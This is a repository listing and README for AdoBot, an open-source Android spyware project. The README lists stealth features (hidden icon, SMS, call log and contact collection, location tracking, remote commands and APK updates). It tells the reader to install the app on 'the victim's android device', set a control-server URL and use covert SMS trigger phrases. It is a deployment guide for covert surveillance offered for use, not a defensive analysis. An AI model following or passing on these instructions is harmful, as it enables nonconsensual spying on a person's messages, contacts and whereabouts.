https://github.com/adonespitogo/adobot
Open-source android spyware
https://github.com/adonespitogo/adobot
android spyware
Last synced: about 1 year ago
JSON representation
Open-source android spyware
- Host: GitHub
- URL: https://github.com/adonespitogo/adobot
- Owner: adonespitogo
- License: mit
- Created: 2017-02-17T16:14:24.000Z (over 9 years ago)
- Default Branch: main
- Last Pushed: 2024-09-23T19:38:24.000Z (over 1 year ago)
- Last Synced: 2025-05-16T05:04:01.805Z (about 1 year ago)
- Topics: android, spyware
- Language: Java
- Homepage:
- Size: 1.54 MB
- Stars: 890
- Watchers: 71
- Forks: 322
- Open Issues: 24
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOGS.md
- License: MIT-License.txt
Awesome Lists containing this project
README
# AdoBot
Opensource Android Spyware
# Features
- Realtime command execution
- Schedule commands
- Hidden app icon (stealth mode)
- Fetch SMS in
- Fetch call logs
- Fetch contacts
- Send SMS command
- Forward received/sent SMS
- Monitor location
- Update apk remotely
- Data collected are retained in database
- Realtime notifications about device status
- Transfer bot reporting to another server
- For android 6 and above:
- You can view the permissions of the app
- The app asks for permission when a certain command is sent the there is no permission
# Need help/Todo
- access files
- take photo stealthly
- get browser history
- and more...
# Instructions
Just compile (as signed APK) and install the app to the victim's android device. Then start the app and configure the parameters:
- ***Server URL:*** Set the URL of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server. It must include the protocol i.e. `https://adobot.herokuapp.com` (default).
- ***SMS Open Command:*** Send an SMS to any number containing this text to open the Adobot settings. "Open adobot" (default).
- ***Force Command:*** Send an SMS containing this text to the victim's phone to forcefully sync data to server. "Baby?" (default).
Next go to [https://github.com/adonespitogo/AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) and follow the instructions on setting up the admin panel.
# Management Console Screen Shots
## Main GUI

## Location Tab

## Main SMS Tab

## Single SMS Thread View
SMS thread is a pop up modal

## Call Logs Tab

## Contacts Tab

## Pending Commands Tab
When you send a command to an offline device, the command is stored in the datase and will be executed once the device connects online.

## Update APK

## Notifications


## License
Released under [MIT License](./MIT-License.txt)